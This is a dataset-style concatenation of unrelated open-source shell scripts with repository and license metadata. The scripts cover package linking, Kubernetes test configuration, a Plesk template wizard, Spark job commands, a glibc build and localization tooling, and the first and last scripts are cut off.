shift; shift; shift
if [ "$*"x != x ]
then
for name in $*
do
if [ ! -d "/opt/$package/$name" ]
then
if [ -e "/opt/$package/$name" ]
then
echo "$0: ERROR: directory expected: /opt/$package/$name" 1>&2
else
echo "$0: INFO: creating directory: /opt/$package/$name"
mkdir -p "/opt/$package/$name"
fi
fi
done
fi
ls "$prefix" | while read name
do
if [ ! -e "/opt/$package/$name" ]
then
(cd "/opt/$package"; rm -f "$name"; ln -s "$linkname"/"$name" "$name")
fi
done
}
# link_default PACKAGE PREFIX [non-link-dirs]
function link_default()
{
link_common ".default" $*
}
# link_active PACKAGE PREFIX [non-link-dirs]
function link_active()
{
link_common ".active" $*
}
# link_major PACKAGE PREFIX MAJOR [non-link-dirs]
function link_major()
{
local package="$1"
local prefix="$2"
local major="$3"
[ -d "/opt/$package/$major" ] || mkdir -p "/opt/$package/$major"
shift; shift; shift
if [ "$*"x != x ]
then
for name in $*
do
if [ ! -d "/opt/$package/$major/$name" ]
then
if [ -e "/opt/$package/$major/$name" ]
then
echo "$0: ERROR: directory expected: /opt/$package/$major/$name" 1>&2
else
echo "$0: INFO: creating directory: /opt/$package/$major/$name"
mkdir -p "/opt/$package/$major/$name"
fi
fi
done
fi
ls "$prefix" | while read name
do
if [ ! -e "/opt/$package/$major/$name" ]
then
(cd "/opt/$package/$major"; rm -f "$name"; ln -s .active/"$name" "$name")
fi
done
if [ ! -e "/opt/$package/$major/.active" ]
then
local relname=$(echo "$prefix" | sed -e "s:/opt/$package/.release/::")
(cd "/opt/$package/$major"; ln -s $(echo "$prefix" | sed -e "s:/opt/$package/:../:") .active)
echo "$0: INFO: setting release $relname as active for $major"
fi
}
# add_user name [uid [comment [home [shell]]]]
# add a daemon (no login) user
function add_user()
{
local username="$1"
local user_uid
local user_comment
local user_home
local user_shell
local check_uid=$(id -u "$username" 2> /dev/null)
local set_uid
if [ "$2"x = x ]
then
user_uid=""
set_uid=""
else
user_uid="$2"
set_uid="--system --uid=$2"
fi
if [ "$3"x = x ]
then
user_comment="$1"
else
user_comment="$3"
fi
if [ "$4"x = x ]
then
user_home="/var/empty/$username"
else
user_home="$4"
fi
if [ "$5"x = x ]
then
user_shell="/sbin/nologin"
else
user_shell="$5"
fi
if [ "$check_uid"x != x ]
then
if [ "$user_uid"x != x -a "$check_uid" != "$user_uid" ]
then
echo "$0: ERROR: user $username exists. uid $check_uid. expected $user_uid." 1>&2
else
echo "$0: INFO: user already exists: $username (uid $check_uid)"
fi
else
if [ ! -d "$user_home" ]
then
echo "$0: INFO: created home directory: $user_home"
mkdir -p "$user_home"
fi
useradd \
--no-create-home --user-group \
$set_uid \
--comment="$user_comment" \
--home-dir="$user_home" \
--shell="$user_shell" \
"$username"
echo "$0: INFO: created user: $username"
fi
}
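# Example usage (sketch; uid, comment and home are illustrative only):
#   add_user webapp 510 "Web application daemon" /var/lib/webapp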
|
samplx/installers
|
installer-functions.sh
|
Shell
|
apache-2.0
| 6,918 |
#!/bin/bash
# Copyright 2014 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# TODO(jbeda): Provide a way to override project
# gcloud multiplexing for shared GCE/GKE tests.
KUBE_ROOT=$(dirname "${BASH_SOURCE}")/../..
source "${KUBE_ROOT}/cluster/gce/config-common.sh"
GCLOUD=gcloud
ZONE=${KUBE_GCE_ZONE:-us-central1-b}
REGION=${ZONE%-*}
RELEASE_REGION_FALLBACK=${RELEASE_REGION_FALLBACK:-false}
REGIONAL_KUBE_ADDONS=${REGIONAL_KUBE_ADDONS:-true}
NODE_SIZE=${NODE_SIZE:-n1-standard-2}
NUM_NODES=${NUM_NODES:-3}
MASTER_SIZE=${MASTER_SIZE:-n1-standard-$(get-master-size)}
MASTER_DISK_TYPE=pd-ssd
MASTER_DISK_SIZE=${MASTER_DISK_SIZE:-20GB}
NODE_DISK_TYPE=${NODE_DISK_TYPE:-pd-standard}
NODE_DISK_SIZE=${NODE_DISK_SIZE:-100GB}
REGISTER_MASTER_KUBELET=${REGISTER_MASTER:-true}
KUBE_APISERVER_REQUEST_TIMEOUT=300
PREEMPTIBLE_NODE=${PREEMPTIBLE_NODE:-false}
PREEMPTIBLE_MASTER=${PREEMPTIBLE_MASTER:-false}
KUBE_DELETE_NODES=${KUBE_DELETE_NODES:-true}
KUBE_DELETE_NETWORK=${KUBE_DELETE_NETWORK:-true}
MASTER_OS_DISTRIBUTION=${KUBE_MASTER_OS_DISTRIBUTION:-${KUBE_OS_DISTRIBUTION:-gci}}
NODE_OS_DISTRIBUTION=${KUBE_NODE_OS_DISTRIBUTION:-${KUBE_OS_DISTRIBUTION:-debian}}
if [[ "${MASTER_OS_DISTRIBUTION}" == "coreos" ]]; then
MASTER_OS_DISTRIBUTION="container-linux"
fi
if [[ "${NODE_OS_DISTRIBUTION}" == "coreos" ]]; then
NODE_OS_DISTRIBUTION="container-linux"
fi
if [[ "${MASTER_OS_DISTRIBUTION}" == "cos" ]]; then
MASTER_OS_DISTRIBUTION="gci"
fi
if [[ "${NODE_OS_DISTRIBUTION}" == "cos" ]]; then
NODE_OS_DISTRIBUTION="gci"
fi
# By default a cluster will be started with the master on GCI and nodes on
# containervm. If you are updating the containervm version, update this
# variable. Also please update corresponding image for node e2e at:
# https://github.com/kubernetes/kubernetes/blob/master/test/e2e_node/jenkins/image-config.yaml
CVM_VERSION=${CVM_VERSION:-container-vm-v20170201}
GCI_VERSION=${KUBE_GCI_VERSION:-gci-dev-56-8977-0-0}
MASTER_IMAGE=${KUBE_GCE_MASTER_IMAGE:-}
MASTER_IMAGE_PROJECT=${KUBE_GCE_MASTER_PROJECT:-google-containers}
NODE_IMAGE=${KUBE_GCE_NODE_IMAGE:-${CVM_VERSION}}
NODE_IMAGE_PROJECT=${KUBE_GCE_NODE_PROJECT:-google-containers}
CONTAINER_RUNTIME=${KUBE_CONTAINER_RUNTIME:-docker}
GCI_DOCKER_VERSION=${KUBE_GCI_DOCKER_VERSION:-}
RKT_VERSION=${KUBE_RKT_VERSION:-1.23.0}
RKT_STAGE1_IMAGE=${KUBE_RKT_STAGE1_IMAGE:-coreos.com/rkt/stage1-coreos}
NETWORK=${KUBE_GCE_NETWORK:-e2e}
INSTANCE_PREFIX="${KUBE_GCE_INSTANCE_PREFIX:-e2e-test-${USER}}"
CLUSTER_NAME="${CLUSTER_NAME:-${INSTANCE_PREFIX}}"
MASTER_NAME="${INSTANCE_PREFIX}-master"
INITIAL_ETCD_CLUSTER="${MASTER_NAME}"
ETCD_QUORUM_READ="${ENABLE_ETCD_QUORUM_READ:-false}"
MASTER_TAG="${INSTANCE_PREFIX}-master"
NODE_TAG="${INSTANCE_PREFIX}-minion"
CLUSTER_IP_RANGE="${CLUSTER_IP_RANGE:-10.180.0.0/14}"
MASTER_IP_RANGE="${MASTER_IP_RANGE:-10.246.0.0/24}"
RUNTIME_CONFIG="${KUBE_RUNTIME_CONFIG:-}"
# Optional: set feature gates
FEATURE_GATES="${KUBE_FEATURE_GATES:-}"
TERMINATED_POD_GC_THRESHOLD=${TERMINATED_POD_GC_THRESHOLD:-100}
# Extra docker options for nodes.
EXTRA_DOCKER_OPTS="${EXTRA_DOCKER_OPTS:-}"
# Enable the docker debug mode.
EXTRA_DOCKER_OPTS="${EXTRA_DOCKER_OPTS} --debug"
SERVICE_CLUSTER_IP_RANGE="10.0.0.0/16" # formerly PORTAL_NET
# When set to true, Docker Cache is enabled by default as part of the cluster bring up.
ENABLE_DOCKER_REGISTRY_CACHE=true
# Optional: Deploy a L7 loadbalancer controller to fulfill Ingress requests:
# glbc - GCE L7 Load Balancer Controller
ENABLE_L7_LOADBALANCING="${KUBE_ENABLE_L7_LOADBALANCING:-glbc}"
# Optional: Cluster monitoring to setup as part of the cluster bring up:
# none - No cluster monitoring setup
# influxdb - Heapster, InfluxDB, and Grafana
# google - Heapster, Google Cloud Monitoring, and Google Cloud Logging
# googleinfluxdb - Enable influxdb and google (except GCM)
# standalone - Heapster only. Metrics available via Heapster REST API.
ENABLE_CLUSTER_MONITORING="${KUBE_ENABLE_CLUSTER_MONITORING:-influxdb}"
# Set etcd image (e.g. 3.0.14-experimental.1) version (e.g. 3.0.14) if you need
# non-default version.
ETCD_IMAGE="${TEST_ETCD_IMAGE:-}"
ETCD_VERSION="${TEST_ETCD_VERSION:-}"
# Default Log level for all components in test clusters and variables to override it in specific components.
TEST_CLUSTER_LOG_LEVEL="${TEST_CLUSTER_LOG_LEVEL:---v=4}"
KUBELET_TEST_LOG_LEVEL="${KUBELET_TEST_LOG_LEVEL:-$TEST_CLUSTER_LOG_LEVEL}"
DOCKER_TEST_LOG_LEVEL="${DOCKER_TEST_LOG_LEVEL:---log-level=info}"
API_SERVER_TEST_LOG_LEVEL="${API_SERVER_TEST_LOG_LEVEL:-$TEST_CLUSTER_LOG_LEVEL}"
CONTROLLER_MANAGER_TEST_LOG_LEVEL="${CONTROLLER_MANAGER_TEST_LOG_LEVEL:-$TEST_CLUSTER_LOG_LEVEL}"
SCHEDULER_TEST_LOG_LEVEL="${SCHEDULER_TEST_LOG_LEVEL:-$TEST_CLUSTER_LOG_LEVEL}"
KUBEPROXY_TEST_LOG_LEVEL="${KUBEPROXY_TEST_LOG_LEVEL:-$TEST_CLUSTER_LOG_LEVEL}"
TEST_CLUSTER_DELETE_COLLECTION_WORKERS="${TEST_CLUSTER_DELETE_COLLECTION_WORKERS:---delete-collection-workers=1}"
TEST_CLUSTER_MAX_REQUESTS_INFLIGHT="${TEST_CLUSTER_MAX_REQUESTS_INFLIGHT:-}"
TEST_CLUSTER_RESYNC_PERIOD="${TEST_CLUSTER_RESYNC_PERIOD:---min-resync-period=3m}"
# ContentType used by all components to communicate with apiserver.
TEST_CLUSTER_API_CONTENT_TYPE="${TEST_CLUSTER_API_CONTENT_TYPE:-}"
# ContentType used to store objects in underlying database.
TEST_CLUSTER_STORAGE_CONTENT_TYPE="${TEST_CLUSTER_STORAGE_CONTENT_TYPE:-}"
KUBELET_TEST_ARGS="${KUBELET_TEST_ARGS:-} --max-pods=110 --serialize-image-pulls=false --outofdisk-transition-frequency=0 ${TEST_CLUSTER_API_CONTENT_TYPE}"
APISERVER_TEST_ARGS="${APISERVER_TEST_ARGS:-} --runtime-config=extensions/v1beta1 ${TEST_CLUSTER_DELETE_COLLECTION_WORKERS} ${TEST_CLUSTER_MAX_REQUESTS_INFLIGHT} ${TEST_CLUSTER_STORAGE_CONTENT_TYPE}"
CONTROLLER_MANAGER_TEST_ARGS="${CONTROLLER_MANAGER_TEST_ARGS:-} ${TEST_CLUSTER_RESYNC_PERIOD} ${TEST_CLUSTER_API_CONTENT_TYPE}"
SCHEDULER_TEST_ARGS="${SCHEDULER_TEST_ARGS:-} ${TEST_CLUSTER_API_CONTENT_TYPE}"
KUBEPROXY_TEST_ARGS="${KUBEPROXY_TEST_ARGS:-} ${TEST_CLUSTER_API_CONTENT_TYPE}"
# Optional: Enable node logging.
ENABLE_NODE_LOGGING="${KUBE_ENABLE_NODE_LOGGING:-true}"
LOGGING_DESTINATION="${KUBE_LOGGING_DESTINATION:-gcp}" # options: elasticsearch, gcp
# Optional: When set to true, Elasticsearch and Kibana will be setup as part of the cluster bring up.
ENABLE_CLUSTER_LOGGING="${KUBE_ENABLE_CLUSTER_LOGGING:-true}"
ELASTICSEARCH_LOGGING_REPLICAS=1
# Optional: Don't require https for registries in our local RFC1918 network
if [[ ${KUBE_ENABLE_INSECURE_REGISTRY:-false} == "true" ]]; then
EXTRA_DOCKER_OPTS="${EXTRA_DOCKER_OPTS} --insecure-registry 10.0.0.0/8"
fi
# Optional: Install cluster DNS.
ENABLE_CLUSTER_DNS="${KUBE_ENABLE_CLUSTER_DNS:-true}"
DNS_SERVER_IP="10.0.0.10"
DNS_DOMAIN="cluster.local"
# Optional: Enable DNS horizontal autoscaler
ENABLE_DNS_HORIZONTAL_AUTOSCALER="${KUBE_ENABLE_DNS_HORIZONTAL_AUTOSCALER:-true}"
# Optional: Install cluster docker registry.
ENABLE_CLUSTER_REGISTRY="${KUBE_ENABLE_CLUSTER_REGISTRY:-false}"
CLUSTER_REGISTRY_DISK="${CLUSTER_REGISTRY_DISK:-${INSTANCE_PREFIX}-kube-system-kube-registry}"
CLUSTER_REGISTRY_DISK_SIZE="${CLUSTER_REGISTRY_DISK_SIZE:-200GB}"
CLUSTER_REGISTRY_DISK_TYPE_GCE="${CLUSTER_REGISTRY_DISK_TYPE_GCE:-pd-standard}"
# Optional: Install Kubernetes UI
ENABLE_CLUSTER_UI="${KUBE_ENABLE_CLUSTER_UI:-true}"
# Optional: Install node problem detector.
ENABLE_NODE_PROBLEM_DETECTOR="${KUBE_ENABLE_NODE_PROBLEM_DETECTOR:-true}"
# Optional: Create autoscaler for cluster's nodes.
ENABLE_CLUSTER_AUTOSCALER="${KUBE_ENABLE_CLUSTER_AUTOSCALER:-false}"
if [[ "${ENABLE_CLUSTER_AUTOSCALER}" == "true" ]]; then
AUTOSCALER_MIN_NODES="${KUBE_AUTOSCALER_MIN_NODES:-}"
AUTOSCALER_MAX_NODES="${KUBE_AUTOSCALER_MAX_NODES:-}"
AUTOSCALER_ENABLE_SCALE_DOWN="${KUBE_AUTOSCALER_ENABLE_SCALE_DOWN:-false}"
fi
# Optional: Enable Rescheduler
ENABLE_RESCHEDULER="${KUBE_ENABLE_RESCHEDULER:-true}"
# If we included ResourceQuota, we should keep it at the end of the list to prevent incrementing quota usage prematurely.
ADMISSION_CONTROL="${KUBE_ADMISSION_CONTROL:-NamespaceLifecycle,LimitRanger,ServiceAccount,PersistentVolumeLabel,DefaultStorageClass,ResourceQuota}"
# Optional: if set to true kube-up will automatically check for existing resources and clean them up.
KUBE_UP_AUTOMATIC_CLEANUP=${KUBE_UP_AUTOMATIC_CLEANUP:-false}
# Optional: setting it to true denotes this is a testing cluster,
# so that we can use pulled kubernetes binaries, even if binaries
# are pre-installed in the image. Note that currently this logic
# is only supported in trusty or GCI.
TEST_CLUSTER="${TEST_CLUSTER:-true}"
# Storage backend. 'etcd2' supported, 'etcd3' experimental.
STORAGE_BACKEND=${STORAGE_BACKEND:-}
# OpenContrail networking plugin specific settings
NETWORK_PROVIDER="${NETWORK_PROVIDER:-kubenet}" # none, opencontrail, kubenet
OPENCONTRAIL_TAG="${OPENCONTRAIL_TAG:-R2.20}"
OPENCONTRAIL_KUBERNETES_TAG="${OPENCONTRAIL_KUBERNETES_TAG:-master}"
OPENCONTRAIL_PUBLIC_SUBNET="${OPENCONTRAIL_PUBLIC_SUBNET:-10.1.0.0/16}"
# Network Policy plugin specific settings.
NETWORK_POLICY_PROVIDER="${NETWORK_POLICY_PROVIDER:-none}" # calico
# How should the kubelet configure hairpin mode?
HAIRPIN_MODE="${HAIRPIN_MODE:-promiscuous-bridge}" # promiscuous-bridge, hairpin-veth, none
# Optional: if set to true, kube-up will configure the cluster to run e2e tests.
E2E_STORAGE_TEST_ENVIRONMENT=${KUBE_E2E_STORAGE_TEST_ENVIRONMENT:-false}
# Optional: if set to true, a image puller is deployed. Only for use in e2e clusters.
# TODO: Pipe this through GKE e2e clusters once we know it helps.
PREPULL_E2E_IMAGES="${PREPULL_E2E_IMAGES:-true}"
# Evict pods whenever compute resource availability on the nodes gets below a threshold.
EVICTION_HARD="${EVICTION_HARD:-memory.available<250Mi,nodefs.available<10%,nodefs.inodesFree<5%}"
# Optional: custom scheduling algorithm
SCHEDULING_ALGORITHM_PROVIDER="${SCHEDULING_ALGORITHM_PROVIDER:-}"
# Optional: install a default StorageClass
ENABLE_DEFAULT_STORAGE_CLASS="${ENABLE_DEFAULT_STORAGE_CLASS:-true}"
# TODO(dawn1107): Remove this once the flag is built into CVM image.
# Kernel panic upon soft lockup issue
SOFTLOCKUP_PANIC="${SOFTLOCKUP_PANIC:-true}" # true, false
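# Example (illustrative, not part of the original file): these defaults can be
# overridden from the environment when bringing the test cluster up, e.g.:
#   NUM_NODES=5 KUBE_GCE_ZONE=us-central1-f ./cluster/kube-up.sh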
|
rkouj/kubernetes
|
cluster/gce/config-test.sh
|
Shell
|
apache-2.0
| 10,760 |
#!/bin/bash
# Copyright 2021 The Verible Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Latest Python version in Xenial is 3.5. `verible_verilog_syntax.py` test
# requires at least 3.6.
echo 'deb http://ppa.launchpad.net/deadsnakes/ppa/ubuntu bionic main' | sudo tee /etc/apt/sources.list.d/deadsnakes.list
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys F23C5A6CF475977595C89F51BA6932366A755776
sudo apt update
sudo apt install -y \
curl \
python3.9 libpython3.9-stdlib \
python3.9-distutils
sudo ln -sf /usr/bin/python3.9 /usr/bin/python3
python3 --version
|
chipsalliance/verible
|
.github/bin/install-python.sh
|
Shell
|
apache-2.0
| 1,100 |
#!/bin/bash
clear
#### Information for metadata file #######
echo "##########################################"
echo "## Plesk Extension EZ-Template Wizard ##"
echo "## created by Jamie Charleston of Plesk ##"
echo "##########################################"
echo
echo "Select the OS you are building this template for:"
echo "A) CentOS B) Ubuntu C) Debian D) RHEL "
read os_name
case $os_name in
a|A) osname="centos" ;;
b|B) osname="ubuntu" ;;
c|C) osname="debian" ;;
d|D) osname="rhel" ;;
esac
clear
echo Time to choose an OS version
case $osname in
centos)
echo Which Version of CentOS
echo "A)6 B)7"
read os_version
case $os_version in
a|A) osver="6" ;;
b|B) osver="7" ;;
esac
;;
debian)
echo Which Version of Debian
echo "A)7 B)8"
read os_version
case $os_version in
a|A) osver="7" ;;
b|B) osver="8" ;;
esac
;;
ubuntu)
echo Which Version of Ubuntu
echo "A)12.04 B)14.04 C)16.04"
read os_version
case $os_version in
a|A) osver="12.04" ;;
b|B) osver="14.04" ;;
c|C) osver="16.04" ;;
esac
;;
rhel)
echo Which Version of RHEL
echo "A)6 B)7"
read os_version
case $os_version in
a|A) osver="6" ;;
b|B) osver="7" ;;
esac
;;
esac
clear
echo "What architecture are you building this template for?"
echo "A) x86 B) x86_64 "
read os_arch
case $os_arch in
a|A) osarch="x86" ;;
b|B) osarch="x86_64" ;;
esac
clear
echo Name this application template.
echo "(No white spaces)"
read appname
clear
echo "Please provide a description of the application:"
read description
clear
echo "Please provide the primary Virtuozzo package dependency."
read dependency
clear
#### Information for post-install file to install extension #######
echo "Please provide the extension install URL."
read extension_url
clear
echo "Making new directory $appname.$osver.$osarch"
mkdir "$appname"."$osver"."$osarch"
echo
echo "Changing to working directory $appname.$osver.$osarch"
cd "$appname"."$osver"."$osarch"
echo
echo creating "$appname".metadata file
echo
##### Create Files ######
###### Create metadata ######
echo "%osname
$osname
%osver
$osver
%osarch
$osarch
%appname
$appname
%description
$description
%packages
%packages_0
%packages_1
$dependency" > "$appname".metadata
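# For example, answering centos / 7 / x86_64 / mysql above would produce a
# mysql.metadata file along these lines (illustrative values):
# %osname
# centos
# %osver
# 7
# %osarch
# x86_64
# %appname
# mysql
# %description
# <description entered above>
# %packages
# %packages_0
# %packages_1
# <primary dependency entered above>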
##### Create post-install file ######
echo creating post-install file
echo
echo "
plesk bin extension --install-url $extension_url
" > post-install
echo creating the ez-template
vzmktmpl --post-install post-install "$appname".metadata
|
Revmagi/Plesk-Extension-Virtuozzo-EZ-templates
|
PleskExtensionEZWizard.sh
|
Shell
|
apache-2.0
| 2,962 |
sudo timedatectl set-time "yyyy-MM-dd hh:mm:ss"
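# e.g. to pin the clock to noon on 1 June 2015 (illustrative values):
#   sudo timedatectl set-time "2015-06-01 12:00:00"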
|
jpodeszwik/hadoop-workshop2
|
code/timedatectl.sh
|
Shell
|
apache-2.0
| 48 |
cd ~/spark-examples
rm -f *.java
export MY_APP_JAR=MY_2.10-2015.08.12.jar
export MY_DATA_DIR=hdfs:///user/root/data
export MY_AREA=test
export MY_DB_CONNECT="jdbc:oracle:thin:@192.168.1.1:1521:orcl"
export MY_USERNAME=username
export MY_PASSWORD=password
export SPARK_NUM_EXECUTORS=9
export SPARK_EXECUTOR_MEMORY=2G
./ls.sh
./remove-result-files.sh
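# NOTE: \$CONDITIONS below is the literal placeholder that Sqoop replaces
# with split-boundary predicates during parallel imports (assuming
# import-data.sh wraps a sqoop import; the backslash keeps the shell from
# expanding it prematurely).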
./import-data.sh "select * from EXPORT_TABLE1 where \$CONDITIONS" TABLE1 AREA 1
./union-data.sh "dump/TABLE1:dump/TABLE2" "TABLE.all"
./tool-validate-items-splitting.sh "${MY_DATA_DIR}/${MY_AREA}/TABLE1" 10
./tool-count.sh ${MY_DATA_DIR}/${MY_AREA}/TABLE1
./tool-head.sh ${MY_DATA_DIR}/${MY_AREA}/TABLE1 10
./tool-distinct.sh ${MY_DATA_DIR}/${MY_AREA}/TABLE1 2
./tool-grep.sh ${MY_DATA_DIR}/${MY_AREA}/TABLE1 "2014-09-03"
./tool-sample.sh ${MY_DATA_DIR}/${MY_AREA}/TABLE1 0.00001
./export-data.sh TABLE1 6
|
ruoyousi/spark-examples
|
bin/commands-examples.sh
|
Shell
|
apache-2.0
| 864 |
/Applications/MATLAB_R2015b.app/bin/matlab -nodesktop -nosplash -minimize -r "cd C:\\wamp\\www; run('DataStreamEXEMarch20at314pm.m'); exit;"
|
zmbernho/FYDP
|
game/runMATLAB.sh
|
Shell
|
apache-2.0
| 140 |
#!/bin/bash
##### OPTIONS
# (required) path to .clustering file
CLUSTER_FILE_PATH=$1
CLUSTER_FILE_NAME=$(basename "$CLUSTER_FILE_PATH" ".clustering")
##### VARIABLES
# the name to give to the LSF job (to be extended with additional info)
JOB_NAME="PRIDE-CLUSTER-LOADER"
# memory limit in MB
MEMORY_LIMIT=10000
# log file name
LOG_FILE_NAME="${JOB_NAME}-${CLUSTER_FILE_NAME}"
##### RUN it on the production LSF cluster #####
##### NOTE: you can change the LSF job group to modify how many jobs can run concurrently #####
bsub -M ${MEMORY_LIMIT} -R "rusage[mem=${MEMORY_LIMIT}]" -q production-rh6 -g /pride_cluster_loader -o /dev/null -J ${JOB_NAME} ./runInJava.sh ./log/${LOG_FILE_NAME}.log ${MEMORY_LIMIT}m -cp ${project.build.finalName}.jar uk.ac.ebi.pride.tools.cluster.loader.ClusteringFileLoader -input ${CLUSTER_FILE_PATH}
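# For example, the concurrency cap on the job group used above can be
# adjusted with LSF's job-group tooling (illustrative, needs suitable
# permissions):
#   bgmod -L 20 /pride_cluster_loader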
|
PRIDE-Cluster/cluster-result-importer
|
scripts/runClusterLoader.sh
|
Shell
|
apache-2.0
| 835 |
#!/bin/bash
set -e
Xvfb :10 -screen 0 1280x1024x24 &
sleep 3
cd /freedom-for-firefox
grunt test
|
freedomjs/freedom-for-firefox
|
tools/docker-entrypoint.sh
|
Shell
|
apache-2.0
| 97 |
#!/bin/bash
virtualenv -p /usr/bin/python2.7 leonardo_venv
cd leonardo_venv
. $PWD/bin/activate
pip install -e git+https://github.com/django-leonardo/django-leonardo@develop#egg=django-leonardo
pip install -r $PWD/src/django-leonardo/requirements.txt
pip install -e git+https://github.com/leonardo-modules/leonardo-store#egg=leonardo_store
pip install -r $PWD/src/leonardo_store/requirements.txt
django-admin startproject --template=https://github.com/django-leonardo/site-template/archive/master.zip myproject
export PYTHONPATH=$PWD/myproject
cd myproject
python manage.py makemigrations --noinput
python manage.py migrate --noinput
python manage.py sync_all
echo "from django.contrib.auth.models import User; User.objects.create_superuser('root', '[email protected]', 'admin')" | python manage.py shell
python manage.py runserver 0.0.0.0:80
|
amboycharlie/Child-Friendly-LCMS
|
contrib/scripts/install_store.sh
|
Shell
|
apache-2.0
| 850 |
#!/bin/sh
curl -XDELETE localhost:9200/test
curl -XPUT localhost:9200/test -d'
{
"settings" : {
"number_of_shards" : 1
},
"mappings" : {
"doc" : {
"properties" : {
"text" : { "type" : "string", "analyzer" : "standard" }
}
}
}
}'
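# A quick smoke test of the freshly created index (illustrative; uses the
# same pre-5.x API style as the mapping above):
curl -XPUT 'localhost:9200/test/doc/1' -d'{"text" : "hello world"}'
curl 'localhost:9200/test/_search?q=text:hello'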
|
flaxsearch/luwak_tests
|
compare_percolator/reset-es-test-index.sh
|
Shell
|
apache-2.0
| 357 |
#!/bin/bash
if [ -n "$TRAVIS_TAG" ]; then
./gradlew bintrayUpload -i
fi
|
scarabresearch/EmarsysPredictSDKAndroid
|
.travis/upload_to_bintray.sh
|
Shell
|
apache-2.0
| 75 |
#!/bin/bash
# set DRY_RUN to make the script run nothing on Amazon occasionally
#DRY_RUN="--dry-run"
#check if we are root (for example running with sudo)
ROOT=$(whoami)
if [ ! "xroot" == "x$ROOT" ];
then
echo "$0 requires root permissions to run."
echo "please run: sudo $0"
exit 1
fi
set -x
. folders.config
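# folders.config is expected to define the directories prepared below, e.g.
# (illustrative values, not the project's actual defaults):
#   LOG_DIR=/var/log/impala-to-go
#   IMPALA_TO_GO_CACHE=/var/cache/impala-to-go
#   CLUSTER_VAR_BASE=/var/impala-to-go/clusters
#   KNOWN_CLUSTERS_DIR=/var/impala-to-go/known-clusters
#   LOCK_DIR=/var/lock/impala-to-go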
function prepare_folder(){
local FOLDER=$1
mkdir -p $FOLDER
chmod -R o+rw $FOLDER
chmod -R g+rw $FOLDER
chmod o+x $FOLDER
}
prepare_folder $LOG_DIR
prepare_folder $IMPALA_TO_GO_CACHE
prepare_folder $CLUSTER_VAR_BASE
prepare_folder $KNOWN_CLUSTERS_DIR
prepare_folder $LOCK_DIR
|
ImpalaToGo/i2g-controller
|
cluster/init_required_folders.sh
|
Shell
|
apache-2.0
| 579 |
#!/usr/bin/env bash
# In order to run this you need to have epydoc (http://epydoc.sourceforge.net/) installed, which can be done
# on Ubuntu with
#
# sudo apt-get install python-epydoc
rm docs/code/*
epydoc --html -o docs/code/ --name "Jisc Publications Router - OAI-PMH endpoint" --url https://github.com/JiscPER/jper-oaipmh --graph all --inheritance grouped --docformat restructuredtext service config
|
JiscPER/jper-oaipmh
|
document.sh
|
Shell
|
apache-2.0
| 405 |
#! /bin/bash
export glibc_install="$(pwd)/sourceware/glibc/build/install"
pushd /root/github
git clone git://sourceware.org/git/glibc.git sourceware/glibc
cd sourceware/glibc
git checkout glibc-2.32
mkdir build
cd build
../configure --prefix "$glibc_install"
make -j `nproc`
make install -j `nproc`
cd install
tar -cvf ../glibc.tar .
cp /root/github/sourceware/glibc/build/glibc.tar /root/github/xunilrj/sandbox/sources/kubernetes/devtest/k8s/glibc.tar
popd
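# Optional sanity check: a freshly built glibc prints its version banner
# when its libc is executed directly (illustrative; path varies by target):
#   "$glibc_install/lib/libc.so.6"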
|
xunilrj/sandbox
|
sources/kubernetes/devtest/k8s/build.glibc.sh
|
Shell
|
apache-2.0
| 461 |
#!/bin/bash
###############################################################################
#
# file: update_l10n.sh
#
# Purpose: Rebuild localization po files.
#
# Note: This file is part of Termsaver-Figlet plugin, and should not be used
# or executed separately.
#
###############################################################################
#
# Copyright 2012 Termsaver
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
###############################################################################
#
# Exit on bash errors
#
#set -o nounset
set -o errexit
base_path="`pwd`/`dirname $0`/.."
cur_dir=`pwd`
locale_path="$base_path/locale"
langs="en ja pt"
function get_prop() {
# add termsaver to path for this plugin
export PYTHONPATH=$PYTHONPATH:/usr/local/share/termsaver
python -c "from figlet import constants; print constants.Plugin.$@"
}
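# Usage sketch: `get_prop "NAME"` should print the plugin's short name
# (apparently "termsaver-figlet", judging by the .po file referenced below),
# which keys all of the locale files this script generates.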
cd $base_path
# remove build stuff (affects the search here)
sudo rm -rfv build
for lang in $langs; do
# create dir, if applicable
d=$locale_path/$lang/LC_MESSAGES
echo "processing $d/termsaver-figlet.po ..."
mkdir -p $d
# create the file if it does not exist yet
omit_header="--omit-header"
new=0
if [ ! -f $d/`get_prop "NAME"`.po ]; then
touch $d/`get_prop "NAME"`.po
omit_header=
new=1
fi
# process i18n
xgettext --language=Python \
--no-wrap \
--force-po \
--join-existing \
--keyword=_ \
$omit_header \
--package-name="`get_prop "TITLE"`" \
--package-version=`get_prop "VERSION"` \
--output=$d/`get_prop "NAME"`.po \
`find $base_path/figlet -iname "*.py"`
# for new files, replace the charset (to avoid warnings)
if [ $new -eq 1 ]; then
sed -i 's/charset=CHARSET/charset=utf-8/' $d/`get_prop "NAME"`.po
fi
# compile po
msgfmt $d/`get_prop "NAME"`.po -o $d/`get_prop "NAME"`.mo
done
# Done!
echo "Done"
|
brunobraga/termsaver-figlet
|
extras/update_l10n.sh
|
Shell
|
apache-2.0
| 2,549 |
#!/bin/bash
#
# Bootstrap a local machine
# - install git
# - clone repo
# - update repos
# - install dependencies
#
# Date: 6-9-2014
# Author: Daniel Mikusa <[email protected]>
#
set -e
# Detect OS & Version
OS=$(cat /etc/issue | cut -d ' ' -f 1)
